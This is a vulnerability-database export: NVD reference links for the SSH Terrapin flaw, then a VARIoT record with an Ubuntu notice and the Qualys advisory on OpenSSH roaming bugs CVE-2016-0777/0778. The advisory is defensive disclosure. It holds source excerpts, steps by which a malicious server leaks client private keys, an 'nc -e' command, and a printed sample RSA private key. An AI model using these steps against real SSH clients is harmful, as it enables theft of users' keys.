"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LZQVUHWVWRH73YBXUQJOD6CKHDQBU3DM/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MKQRBF3DWMWPH36LBCOBUTSIZRTPEZXB/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://matt.ucc.asn.au/dropbear/CHANGES"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://nest.pijul.com/pijul/thrussh/changes/D6H7OWTTMHHX6BTB3B6MNBOBX2L66CBL4LGSEUSAI2MCRCJDQFRQC"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38684904"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38685286"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://news.ycombinator.com/item?id=38732005"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://nova.app/releases/#v11.8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://oryx-embedded.com/download/#changelog"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0002"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://roumenpetrov.info/secsh/#news20231220"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/CVE-2023-48795"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/source-package/libssh2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://security-tracker.debian.org/tracker/source-package/proftpd-dfsg"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://security-tracker.debian.org/tracker/source-package/trilead-ssh2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-16"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.gentoo.org/glsa/202312-17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://security.netapp.com/advisory/ntap-20240105-0004/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://support.apple.com/kb/HT214084"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://thorntech.com/cve-2023-48795-and-sftp-gateway/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://twitter.com/TrueSkrillor/status/1736774389725565005"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://ubuntu.com/security/CVE-2023-48795"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://winscp.net/eng/docs/history#6.2.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.bitvise.com/ssh-client-version-history#933"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.bitvise.com/ssh-server-version-history"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://www.debian.org/security/2023/dsa-5586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://www.debian.org/security/2023/dsa-5588"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.freebsd.org/security/advisories/FreeBSD-SA-23:19.openssh.asc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://www.lancom-systems.de/service-support/allgemeine-sicherheitshinweise#c243508"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.netsarang.com/en/xshell-update-history/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/openbsd.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.openssh.com/txt/release-9.6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/18/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Mitigation"
],
"url": "https://www.openwall.com/lists/oss-security/2023/12/20/3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.paramiko.org/changelog.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://www.reddit.com/r/sysadmin/comments/18idv52/cve202348795_why_is_this_cve_still_undisclosed/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.suse.com/c/suse-addresses-the-ssh-v2-protocol-terrapin-attack-aka-cve-2023-48795/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://www.terrapin-attack.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Press/Media Coverage"
],
"url": "https://www.theregister.com/2023/12/20/terrapin_attack_ssh"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://www.vandyke.com/products/securecrt/history.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.vicarius.io/vsociety/posts/cve-2023-48795-detect-openssh-vulnerabilit"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.vicarius.io/vsociety/posts/cve-2023-48795-mitigate-openssh-vulnerability"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-354"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-354"
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
]
}
VAR-201601-0030
Vulnerability from variot - Updated: 2024-07-23 20:39The (1) roaming_read and (2) roaming_write functions in roaming_common.c in the client in OpenSSH 5.x, 6.x, and 7.x before 7.1p2, when certain proxy and forward options are enabled, do not properly maintain connection file descriptors, which allows remote servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact by requesting many forwardings. OpenSSH client code versions 5.4 through 7.1p1 contains a client information leak vulnerability that could allow an OpenSSH client to leak information not limited to but including private keys, as well as a buffer overflow in certain non-default configurations. In addition, JVNVU#95595627 Then CWE-122 It is published as CWE-122: Heap-based Buffer Overflow http://cwe.mitre.org/data/definitions/122.htmlA large amount of transfer is requested by the remote server, resulting in a denial of service ( Heap-based buffer overflow ) It can be unspecified, such as being put into a state. OpenSSH is prone to a heap-based buffer-overflow vulnerability. Successful exploits may allow attackers to execute arbitrary code in the context of the affected application. Failed attacks will cause denial-of-service conditions. OpenSSH (OpenBSD Secure Shell) is a set of connection tools for securely accessing remote computers maintained by the OpenBSD project team. This tool is an open source implementation of the SSH protocol, supports encryption of all transmissions, and can effectively prevent eavesdropping, connection hijacking, and other network-level attacks. The following versions are affected: OpenSSH 5.x, 6.x, 7.x prior to 7.1p2. ============================================================================ Ubuntu Security Notice USN-2869-1 January 14, 2016
openssh vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
OpenSSH could be made to expose sensitive information over the network.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: openssh-client 1:6.9p1-2ubuntu0.1
Ubuntu 15.04: openssh-client 1:6.7p1-5ubuntu1.4
Ubuntu 14.04 LTS: openssh-client 1:6.6p1-2ubuntu2.4
Ubuntu 12.04 LTS: openssh-client 1:5.9p1-5ubuntu1.8
In general, a standard system update will make all the necessary changes. Qualys Security Advisory
Roaming through the OpenSSH client: CVE-2016-0777 and CVE-2016-0778
======================================================================== Contents ========================================================================
Summary Information Leak (CVE-2016-0777) - Analysis - Private Key Disclosure - Mitigating Factors - Examples Buffer Overflow (CVE-2016-0778) - Analysis - Mitigating Factors - File Descriptor Leak Acknowledgments Proof Of Concept
======================================================================== Summary ========================================================================
Since version 5.4 (released on March 8, 2010), the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session. This information leak may have already been exploited in the wild by sophisticated attackers, and high-profile sites or users may need to regenerate their SSH keys accordingly.
The buffer overflow, on the other hand, is present in the default configuration of the OpenSSH client but its exploitation requires two non-default options: a ProxyCommand, and either ForwardAgent (-A) or ForwardX11 (-X). This buffer overflow is therefore unlikely to have any real-world impact, but provides a particularly interesting case study.
All OpenSSH versions between 5.4 and 7.1 are vulnerable, but can be easily hot-fixed by setting the undocumented option "UseRoaming" to "no", as detailed in the Mitigating Factors section. OpenSSH version 7.1p2 (released on January 14, 2016) disables roaming by default.
======================================================================== Information Leak (CVE-2016-0777) ========================================================================
Analysis
If the OpenSSH client connects to an SSH server that offers the key exchange algorithm "resume@appgate.com", it sends the global request "roaming@appgate.com" to the server, after successful authentication. If this request is accepted, the client allocates a roaming buffer out_buf, by calling malloc() (and not calloc()) with an out_buf_size that is arbitrarily chosen by the server:
63 void 64 roaming_reply(int type, u_int32_t seq, void *ctxt) 65 { 66 if (type == SSH2_MSG_REQUEST_FAILURE) { 67 logit("Server denied roaming"); 68 return; 69 } 70 verbose("Roaming enabled"); .. 75 set_out_buffer_size(packet_get_int() + get_snd_buf_size()); .. 77 }
40 static size_t out_buf_size = 0; 41 static char out_buf = NULL; 42 static size_t out_start; 43 static size_t out_last; .. 75 void 76 set_out_buffer_size(size_t size) 77 { 78 if (size == 0 || size > MAX_ROAMBUF) 79 fatal("%s: bad buffer size %lu", func, (u_long)size); 80 / 81 * The buffer size can only be set once and the buffer will live 82 * as long as the session lives. 83 */ 84 if (out_buf == NULL) { 85 out_buf_size = size; 86 out_buf = xmalloc(size); 87 out_start = 0; 88 out_last = 0; 89 } 90 }
The OpenSSH client's roaming_write() function, a simple wrapper around write(), calls wait_for_roaming_reconnect() to transparently reconnect to the SSH server after a disconnection. It also calls buf_append() to copy the data sent to the server into the roaming buffer out_buf. During a reconnection, the client is therefore able to resend the data that was not received by the server because of the disconnection:
198 void 199 resend_bytes(int fd, u_int64_t offset) 200 { 201 size_t available, needed; 202 203 if (out_start < out_last) 204 available = out_last - out_start; 205 else 206 available = out_buf_size; 207 needed = write_bytes - offset; 208 debug3("resend_bytes: resend %lu bytes from %llu", 209 (unsigned long)needed, (unsigned long long)*offset); 210 if (needed > available) 211 fatal("Needed to resend more data than in the cache"); 212 if (out_last < needed) { 213 int chunkend = needed - out_last; 214 atomicio(vwrite, fd, out_buf + out_buf_size - chunkend, 215 chunkend); 216 atomicio(vwrite, fd, out_buf, out_last); 217 } else { 218 atomicio(vwrite, fd, out_buf + (out_last - needed), needed); 219 } 220 }
In the OpenSSH client's roaming buffer out_buf, the most recent data sent to the server begins at index out_start and ends at index out_last. As soon as this circular buffer is full, buf_append() maintains the invariant "out_start = out_last + 1", and consequently three different cases have to be considered:
-
"out_start < out_last" (lines 203-204): out_buf is not full yet (and out_start is still equal to 0), and the amount of data available in out_buf is indeed "out_last - out_start";
-
"out_start > out_last" (lines 205-206): out_buf is full (and out_start is exactly equal to "out_last + 1"), and the amount of data available in out_buf is indeed the entire out_buf_size;
-
"out_start == out_last" (lines 205-206): no data was ever written to out_buf (and both out_start and out_last are still equal to 0) because no data was ever sent to the server after roaming_reply() was called, but the client sends (leaks) the entire uninitialized out_buf to the server (line 214), as if out_buf_size bytes of data were available.
In order to successfully exploit this information leak and retrieve sensitive information from the OpenSSH client's memory (for example, private SSH keys, or memory addresses useful for further exploitation), a malicious server needs to:
-
Massage the client's heap before roaming_reply() malloc()ates out_buf, and force malloc() to return a previously free()d but uncleansed chunk of sensitive information. The simple proof-of-concept in this advisory does not implement heap massaging.
-
Guess the client's get_snd_buf_size() in order to precisely control out_buf_size. OpenSSH < 6.0 accepts out_buf sizes in the range (0,4G), and OpenSSH >= 6.0 accepts sizes in the range (0,2M]. Sizes smaller than get_snd_buf_size() are attainable because roaming_reply() does not protect "packet_get_int() + get_snd_buf_size()" against integer wraparound. The proof-of-concept in this advisory attempts to derive the client's get_snd_buf_size() from the get_recv_buf_size() sent by the client to the server, and simply chooses a random out_buf_size.
-
Advise the client's resend_bytes() that all "available" bytes (the entire out_buf_size) are "needed" by the server, even if fewer bytes were actually written by the client to the server (because the server controls the "offset" argument, and resend_bytes() does not protect "needed = write_bytes - offset" against integer wraparound).
Finally, a brief digression on a minor bug in resend_bytes(): on 64-bit systems, where "chunkend" is a 32-bit signed integer, but "out_buf" and "out_buf_size" are 64-bit variables, "out_buf + out_buf_size - chunkend" may point out-of-bounds, if chunkend is negative (if out_buf_size is in the [2G,4G) range). This negative chunkend is then converted to a 64-bit size_t greater than SSIZE_MAX when passed to atomicio(), and eventually returns EFAULT when passed to write() (at least on Linux and OpenBSD), thus avoiding an out-of-bounds read from the OpenSSH client's memory.
Private Key Disclosure
We initially believed that this information leak in the OpenSSH client's roaming code would not allow a malicious SSH server to steal the client's private keys, because:
-
the information leaked is not read from out-of-bounds memory, but from a previously free()d chunk of memory that is recycled to malloc()ate the client's roaming buffer out_buf;
-
private keys are loaded from disk into memory and freed by key_free() (old API, OpenSSH < 6.7) or sshkey_free() (new API, OpenSSH >= 6.7), and both functions properly cleanse the private keys' memory with OPENSSL_cleanse() or explicit_bzero();
-
temporary copies of in-memory private keys are freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse these copies with memset() or bzero().
However, we eventually identified three reasons why, in our experiments, we were able to partially or completely retrieve the OpenSSH client's private keys through this information leak (depending on the client's version, compiler, operating system, heap layout, and private keys):
(besides these three reasons, other reasons may exist, as suggested by the CentOS and Fedora examples at the end of this section)
-
If a private SSH key is loaded from disk into memory by fopen() (or fdopen()), fgets(), and fclose(), a partial or complete copy of this private key may remain uncleansed in memory. Indeed, these functions manage their own internal buffers, and whether these buffers are cleansed or not depends on the OpenSSH client's libc (stdio) implementation, but not on OpenSSH itself.
-
In all vulnerable OpenSSH versions, SSH's main() function calls load_public_identity_files(), which loads the client's public keys with fopen(), fgets(), and fclose(). Unfortunately, the private keys (without the ".pub" suffix) are loaded first and then discarded, but nonetheless buffered in memory by the stdio functions.
-
In OpenSSH versions <= 5.6, the load_identity_file() function (called by the client's public-key authentication method) loads a private key with fdopen() and PEM_read_PrivateKey(), an OpenSSL function that uses fgets() and hence internal stdio buffering.
Internal stdio buffering is the most severe of the three problems discussed in this section, although GNU/Linux is not affected because the glibc mmap()s and munmap()s (and therefore cleanses) stdio buffers. BSD-based systems, on the other hand, are severely affected because they simply malloc()ate and free() stdio buffers. For interesting comments on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM06-C.+Ensure+that+sensitive+data+is+not+written+out+to+disk
-
In OpenSSH versions >= 5.9, the client's load_identity_file() function (called by the public-key authentication method) read()s a private key in 1024-byte chunks that are appended to a growing buffer (a realloc()ating buffer) with buffer_append() (old API) or sshbuf_put() (new API). Unfortunately, the repeated calls to realloc() may leave partial copies of the private key uncleansed in memory.
-
In OpenSSH < 6.7 (old API), the initial size of such a growing buffer is 4096 bytes: if a private-key file is larger than 4K, a partial copy of this private key may remain uncleansed in memory (a 3K copy in a 4K buffer). Fortunately, only the file of a very large RSA key (for example, an 8192-bit RSA key) can exceed 4K.
-
In OpenSSH >= 6.7 (new API), the initial size of a growing buffer is 256 bytes: if a private-key file is larger than 1K (the size passed to read()), a partial copy of this private key may remain uncleansed in memory (a 1K copy in a 1K buffer). For example, the file of a default-sized 2048-bit RSA key exceeds 1K.
For more information on this issue:
https://www.securecoding.cert.org/confluence/display/c/MEM03-C.+Clear+sensitive+information+stored+in+reusable+resources
https://cwe.mitre.org/data/definitions/244.html
- An OpenSSH growing-buffer that holds a private key is eventually freed by buffer_free() (old API) or sshbuf_free() (new API), and both functions attempt to cleanse the buffer with memset() or bzero() before they call free(). Unfortunately, an optimizing compiler may remove this memset() or bzero() call, because the buffer is written to, but never again read from (an optimization known as Dead Store Elimination).
OpenSSH 6.6 is the only version that is not affected, because it calls explicit_bzero() instead of memset() or bzero().
Dead Store Elimination is the least severe of the three problems explored in this section, because older GCC versions do not remove the memset() or bzero() call made by buffer_free() or sshbuf_free(). GCC 5 and Clang/LLVM do, however, remove it. For detailed discussions of this issue:
https://www.securecoding.cert.org/confluence/display/c/MSC06-C.+Beware+of+compiler+optimizations
https://cwe.mitre.org/data/definitions/14.html
https://sourceware.org/ml/libc-alpha/2014-12/threads.html#00506
Finally, for these three reasons, passphrase-encrypted SSH keys are leaked in their encrypted form, but an attacker may attempt to crack the passphrase offline. On the other hand, SSH keys that are available only through an authentication agent are never leaked, in any form. The vulnerable roaming code can be permanently disabled by adding the undocumented option "UseRoaming no" to the system-wide configuration file (usually /etc/ssh/ssh_config), or per-user configuration file (~/.ssh/config), or command-line (-o "UseRoaming no").
- If an OpenSSH client is disconnected from an SSH server that offers roaming, it prints "[connection suspended, press return to resume]" on stderr, and waits for '\n' or '\r' on stdin (and not on the controlling terminal) before it reconnects to the server; advanced users may become suspicious and press Control-C or Control-Z instead, thus avoiding the information leak:
"pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 [connection suspended, press return to resume]^Z [1]+ Stopped /usr/bin/ssh -p 222 127.0.0.1
However, SSH commands that use the local stdin to transfer data to the remote server are bound to trigger this reconnection automatically (upon reading a '\n' or '\r' from stdin). Moreover, these non-interactive SSH commands (for example, backup scripts and cron jobs) commonly employ public-key authentication and are therefore perfect targets for this information leak:
$ ls -l /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.ls" [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ tar -cf - /etc/passwd | /usr/bin/ssh -p 222 127.0.0.1 "cat > /tmp/passwd.tar" tar: Removing leading `/' from member names [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] ... [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
Similarly, the SCP client uses the SSH client's stdin and stdout to transfer data, and can be forced by a malicious SSH server to output a control record that ends in '\n' (an error message in server-to-client mode, or file permissions in client-to-server mode); this '\n' is then read from stdin by the fgetc() call in wait_for_roaming_reconnect(), and triggers an automatic reconnection that allows the information leak to be exploited without user interaction:
env ROAMING="scp_mode sleep:1" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/scp -P 222 127.0.0.1:/etc/passwd /tmp $ [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting]
$ /usr/bin/scp -P 222 /etc/passwd 127.0.0.1:/tmp [connection suspended, press return to resume][connection resumed] [connection suspended, press return to resume][exiting] lost connection
-
Although a man-in-the-middle attacker can reset the TCP connection between an OpenSSH client and an OpenSSH server (which does not support roaming), it cannot exploit the information leak without breaking server host authentication or integrity protection, because it needs to:
-
first, append the "resume@appgate.com" algorithm name to the server's initial key exchange message;
-
second, in response to the client's "roaming@appgate.com" request, change the server's reply from failure to success.
In conclusion, an attacker who wishes to exploit this information leak must convince its target OpenSSH client to connect to a malicious server (an unlikely scenario), or compromise a trusted server (a more likely scenario, for a determined attacker).
-
In the client, wait_for_roaming_reconnect() calls ssh_connect(), the same function that successfully established the first connection to the server; this function supports four different connection methods, but each method contains a bug and may fail to establish a second connection to the server:
-
In OpenSSH >= 6.5 (released on January 30, 2014), the default ssh_connect_direct() method (a simple TCP connection) is called by wait_for_roaming_reconnect() with a NULL aitop argument, which makes it impossible for the client to reconnect to the server:
418 static int 419 ssh_connect_direct(const char host, struct addrinfo aitop, ... 424 int sock = -1, attempt; 425 char ntop[NI_MAXHOST], strport[NI_MAXSERV]; ... 430 for (attempt = 0; attempt < connection_attempts; attempt++) { ... 440 for (ai = aitop; ai; ai = ai->ai_next) { ... 470 } 471 if (sock != -1) 472 break; / Successful connection. / 473 } 474 475 / Return failure if we didn't get a successful connection. / 476 if (sock == -1) { 477 error("ssh: connect to host %s port %s: %s", 478 host, strport, strerror(errno)); 479 return (-1); 480 }
Incidentally, this error() call displays stack memory from the uninitialized strport[] array, a byproduct of the NULL aitop:
$ /usr/bin/ssh -V OpenSSH_6.8, LibreSSL 2.1
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor [reconnect failed, press return to retry]ssh: connect to host 127.0.0.1 port \300\350\226\373\341: Bad file descriptor
- The special ProxyCommand "-" communicates with the server through the client's stdin and stdout, but these file descriptors are close()d by packet_backup_state() at the beginning of wait_for_roaming_reconnect() and are never reopened again, making it impossible for the client to reconnect to the server. Moreover, the fgetc() that waits for '\n' or '\r' on the closed stdin returns EOF and forces the client to exit():
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013
$ /usr/bin/nc -e "/usr/bin/ssh -o ProxyCommand=- -p 222 127.0.0.1" 127.0.0.1 222 Pseudo-terminal will not be allocated because stdin is not a terminal. user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
- The method ssh_proxy_fdpass_connect() fork()s a ProxyCommand that passes a connected file descriptor back to the client, but it calls fatal() while reconnecting to the server, because waitpid() returns ECHILD; indeed, the SIGCHLD handler (installed by SSH's main() after the first successful connection to the server) calls waitpid() before ssh_proxy_fdpass_connect() does:
1782 static void 1783 main_sigchld_handler(int sig) 1784 { .... 1789 while ((pid = waitpid(-1, &status, WNOHANG)) > 0 || 1790 (pid < 0 && errno == EINTR)) 1791 ; 1792 1793 signal(sig, main_sigchld_handler); .... 1795 }
101 static int 102 ssh_proxy_fdpass_connect(const char host, u_short port, 103 const char proxy_command) 104 { ... 121 / Fork and execute the proxy command. / 122 if ((pid = fork()) == 0) { ... 157 } 158 / Parent. / ... 167 while (waitpid(pid, NULL, 0) == -1) 168 if (errno != EINTR) 169 fatal("Couldn't wait for child: %s", strerror(errno));
$ /usr/bin/ssh -V OpenSSH_6.6.1p1, OpenSSL 1.0.1p-freebsd 9 Jul 2015
$ /usr/bin/ssh -o ProxyUseFdpass=yes -o ProxyCommand="/usr/bin/nc -F %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume]Couldn't wait for child: No child processes
- The method ssh_proxy_connect() fork()s a standard ProxyCommand that connects the client to the server, but if a disconnection occurs, and the SIGCHLD of the terminated ProxyCommand is caught while fgetc() is waiting for a '\n' or '\r' on stdin, EOF is returned (the underlying read() returns EINTR) and the client exit()s before it can reconnect to the server:
$ /usr/bin/ssh -V OpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014
$ /usr/bin/ssh -o ProxyCommand="/bin/nc %h %p" -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][exiting]
This behavior is intriguing, because (at least on Linux and BSD) the signal() call that installed the main_sigchld_handler() is supposed to be equivalent to a sigaction() call with SA_RESTART. However, portable versions of OpenSSH override signal() with mysignal(), a function that calls sigaction() without SA_RESTART.
This last mitigating factor is actually a race-condition bug that depends on the ProxyCommand itself: for example, the client never fails to reconnect to the server when using Socat as a ProxyCommand, but fails occasionally when using Netcat.
Private Key Disclosure example: FreeBSD 10.0, 2048-bit RSA key
$ head -n 1 /etc/motd FreeBSD 10.0-RELEASE (GENERIC) #0 r260789: Thu Jan 16 22:34:59 UTC 2014
$ /usr/bin/ssh -V OpenSSH_6.4p1, OpenSSL 1.0.1e-freebsd 11 Feb 2013
$ cat ~/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA3GKWpUCOmK05ybfhnXTTzWAXs5A0FufmqlihRKqKHyflYXhr qlcdPH4PvbAhkc8cUlK4c/dZxNiyD04Og1MVwVp2kWp9ZDOnuLhTR2mTxYjEy+1T M3/74toaLj28kwbQjTPKhENMlqe+QVH7pH3kdun92SEqzKr7Pjx4/2YzAbAlZpT0 9Zj/bOgA7KYWfjvJ0E9QQZaY68nEB4+vIK3agB6+JT6lFjVnSFYiNQJTPVedhisd a3KoK33SmtURvSgSLBqO6e9uPzV87nMfnSUsYXeej6yJTR0br44q+3paJ7ohhFxD zzqpKnK99F0uKcgrjc3rF1EnlyexIDohqvrxEQIDAQABAoIBAQDHvAJUGsIh1T0+ eIzdq3gZ9jEE6HiNGfeQA2uFVBqCSiI1yHGrm/A/VvDlNa/2+gHtClNppo+RO+OE w3Wbx70708UJ3b1vBvHHFCdF3YWzzVSujZSOZDvhSVHY/tLdXZu9nWa5oFTVZYmk oayzU/WvYDpUgx7LB1tU+HGg5vrrVw6vLPDX77SIJcKuqb9gjrPCWsURoVzkWoWc bvba18loP+bZskRLQ/eHuMpO5ra23QPRmb0p/LARtBW4LMFTkvytsDrmg1OhKg4C vcbTu2WOK1BqeLepNzTSg2wHtvX8DRUJvYBXKosGbaoIOFZvohoqSzKFs+R3L3GW hZz9MxCRAoGBAPITboUDMRmvUblU58VW85f1cmPvrWtFu7XbRjOi3O/PcyT9HyoW bc3HIg1k4XgHk5+F9r5+eU1CiUUd8bOnwMEUTkyr7YH/es+O2P+UoypbpPCfEzEd muzCFN1kwr4RJ5RG7ygxF8/h/toXua1nv/5pruro+G+NI2niDtaPkLdfAoGBAOkP wn7j8F51DCxeXbp/nKc4xtuuciQXFZSz8qV/gvAsHzKjtpmB+ghPFbH+T3vvDCGF iKELCHLdE3vvqbFIkjoBYbYwJ22m4y2V5HVL/mP5lCNWiRhRyXZ7/2dd2Jmk8jrw sj/akWIzXWyRlPDWM19gnHRKP4Edou/Kv9Hp2V2PAoGBAInVzqQmARsi3GGumpme vOzVcOC+Y/wkpJET3ZEhNrPFZ0a0ab5JLxRwQk9mFYuGpOO8H5av5Nm8/PRB7JHi /rnxmfPGIWJX2dG9AInmVFGWBQCNUxwwQzpz9/VnngsjMWoYSayU534SrE36HFtE K+nsuxA+vtalgniToudAr6H5AoGADIkZeAPAmQQIrJZCylY00dW+9G/0mbZYJdBr +7TZERv+bZXaq3UPQsUmMJWyJsNbzq3FBIx4Xt0/QApLAUsa+l26qLb8V+yDCZ+n UxvMSgpRinkMFK/Je0L+IMwua00w7jSmEcMq0LJckwtdjHqo9rdWkvavZb13Vxh7 qsm+NEcCgYEA3KEbTiOU8Ynhv96JD6jDwnSq5YtuhmQnDuHPxojgxSafJOuISI11 1+xJgEALo8QBQT441QSLdPL1ZNpxoBVAJ2a23OJ/Sp8dXCKHjBK/kSdW3U8SJPjV pmvQ0UqnUpUj0h4CVxUco4C906qZSO5Cemu6g6smXch1BCUnY0TcOgs= -----END RSA PRIVATE KEY-----
env ROAMING="client_out_buf_size:1280" "pwd"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key
$ /usr/bin/ssh -p 222 127.0.0.1 user@127.0.0.1's password: [connection suspended, press return to resume][connection resumed]
cat /tmp/roaming-97ed9f59/infoleak
